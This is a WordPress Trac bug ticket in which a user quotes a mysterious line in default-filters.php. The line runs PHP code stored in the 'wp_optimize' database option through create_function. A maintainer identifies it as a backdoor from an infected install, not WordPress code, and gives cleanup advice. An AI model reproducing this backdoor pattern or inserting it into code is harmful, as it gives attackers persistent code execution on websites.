Make WordPress Core

Opened 13 years ago

Closed 13 years ago

Last modified 13 years ago

#18498 closed defect (bug) (invalid)

wp_optimize_func

Reported by: danielpataki's profile danielpataki Owned by:
Milestone: Priority: normal
Severity: critical Version:
Component: General Keywords:
Focuses: Cc:

Description

Hi Everyone,

I am pretty sure my coding is not at fault, but whenever I try to use admin-ajax.php I get a 500 error, but interestingly enough, only when I use an action. If the action is omitted, the script returns -1 as expected.

I tried to narrow down the problem down by following the wp load process and echoing something and exiting the script right after. My goal was to find the point where it stops echoing and gives the 500 error. This point is line 98 in the current dev version of the includes/default-filters.php file (REV 18583)

$wp_optimize_func=create_function(,get_option('wp_optimize'));$wp_optimize_func();

If I uncomment this line, the script works as intended. I am not familiar with this in Wordpress, for reference I have attached the content of the wp_optimize option_value.

I am fairly sure this might be a bug, but let me know if you have any other ideas, or need some further input. I apologize for assigning it a critical severity, my logic behind this is that if this really is a bug, it will break all AJAX functionality at least, which is probably a big deal.

Thank You!

Attachments (1)

wp-optimize.rtf (54.6 KB) - added by danielpataki 13 years ago.

Download all attachments as: .zip

Change History (3)

#1 @dd32
13 years ago

  • Milestone Awaiting Review deleted
  • Resolution set to invalid
  • Status changed from new to closed

Unfortunately, I'm going to have to tell you that your WordPress install is infected with a backdoor. WordPress does not include the code you've refered to above in a stock install: http://core.trac.wordpress.org/browser/trunk/wp-includes/default-filters.php?rev=18583#L98

Some items you might find useful: Codex: FAQ, My site was hacked and Plugin: Exploit Scanner should help find any other items which are also infected - It may not detect that particular exploit however.

The first step is to delete that option from your database and take it from there.

Since Trac is for reporting bugs, I'm closing this as invalid, however you'll definately find more help in the support forums.

Version 0, edited 13 years ago by dd32 (next)

#2 @danielpataki
13 years ago

Hi dd32,

Thanks for your awesome quick response, I will check the repository manually anytime somethings is fishy like this.

Note: See TracTickets for help on using tickets.